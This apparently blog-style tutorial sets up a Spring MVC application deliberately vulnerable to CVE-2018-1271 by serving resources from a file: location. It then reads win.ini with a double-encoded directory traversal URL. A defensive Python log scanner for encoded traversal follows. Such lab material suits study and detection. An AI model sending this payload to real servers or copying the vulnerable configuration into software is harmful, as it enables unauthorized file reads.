Spring Framework Directory Traversal Vulnerability (CVE-2018-1271)

It’s too late for this blog post, but I’ve been caught up with other tasks so couldn’t post this earlier. Anyways, in this blog, we’ll look at how to set up a vulnerable target for CVE-2018-1271 and exploit it.

The issue exists in Spring Framework versions 5.0 to 5.0.4 and 4.3 to 4.3.14, which allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). It should be noted that a few conditions must hold for this vulnerability to be introduced:

  1. The target server is running on Windows.
  2. The application is running on Jetty.
  3. The application serves files from the file system using the file:// protocol.

Setting up a vulnerable target:

1. Install JDK 1.8 or higher.

2. Download Maven 3.6.0 and set it up under C:\Opt\apache-maven-3.6.0

3. Configure Environment Variables:

  • Set JAVA_HOME to C:\Program Files (x86)\Java\jdk1.8.0_171\ or the path where the JDK is installed.
  • Set MAVEN_HOME to C:\Opt\apache-maven-3.6.0\
  • Append the MAVEN_HOME bin directory to the PATH variable: C:\Opt\apache-maven-3.6.0\bin\
  • Launch a command prompt and make sure the following commands work:
    • mvn -version
    • java -version

4. Now download the spring-mvc-showcase sample application, either via Git or as a ZIP: git clone https://github.com/spring-projects/spring-mvc-showcase.git

5. cd into the spring-mvc-showcase-master directory.

6. Edit POM.XML and set org.springframework-version to 5.0.0:

[Screenshot: POM.XML with the Spring Framework version changed to 5.0.0]

7. Locate WebMvcConfig.java; it is usually under ./src/main/java/org/springframework/samples/mvc/config/WebMvcConfig.java

8. Edit WebMvcConfig.java and set registry.addResourceHandler to the following. Serving resources from a file: location on the file system is what makes it vulnerable to directory traversal:

registry.addResourceHandler("/resources/**").addResourceLocations("file:./src/main/resources/","/resources/");

[Screenshot: WebMvcConfig.java modified to use the file:// directive]

9. Now start the project with jetty:

mvn jetty:run

10. Make sure the server is listening on the port specified, usually port 8080.
11. Now visit the following link:

http://:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

12. This should download the WIN.INI file:

[Screenshots: exploiting the path traversal for an arbitrary file download, and the downloaded WIN.INI]
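Added example (not code from the original post or from the Spring project): a small detector, run over constructed access-log lines, that shows why a check decoding the path only once misses the %255c payload used above, while a decode-until-stable check that also treats backslashes as separators catches it. The single_decode_check function is a simplified model, not Spring's actual code.

```python
"""Added example: flag encoded and double-encoded traversal requests against a
static-resource handler in access-log lines. Sample log lines are constructed."""
import re
from urllib.parse import unquote

# Constructed Common Log Format lines; line 2 is the double-encoded payload.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2018:10:00:01 +0000] "GET /spring-mvc-showcase/resources/css/main.css HTTP/1.1" 200 512
10.0.0.7 - - [01/May/2018:10:00:02 +0000] "GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 200 92
10.0.0.9 - - [01/May/2018:10:00:03 +0000] "GET /spring-mvc-showcase/resources/../../etc/passwd HTTP/1.1" 404 0
10.0.0.9 - - [01/May/2018:10:00:04 +0000] "GET /spring-mvc-showcase/resources/img/logo%20v2.png HTTP/1.1" 200 2048
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) ')

def single_decode_check(path):
    """Simplified model (assumption) of a check that decodes once, maps '\\'
    to '/' and looks for '../'. One round turns %255c into '%5c', which is
    not yet a backslash, so '..%5c/' is not recognised as a parent segment."""
    p = unquote(path).replace("\\", "/")
    return "../" in p

def escapes_handler_root(path, prefix="/resources/", max_rounds=3):
    """Decode until stable, treat '\\' as '/', then walk the segments after the
    handler prefix; any '..' that climbs above the prefix is traversal."""
    p = path
    for _ in range(max_rounds):
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    p = p.replace("\\", "/")
    if prefix not in p:
        return False
    depth = 0
    for seg in p.split(prefix, 1)[1].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def scan(log_text):
    """Return (client, path, caught_by_single_decode) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_handler_root(m.group(2)):
            hits.append((m.group(1), m.group(2), single_decode_check(m.group(2))))
    return hits
```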

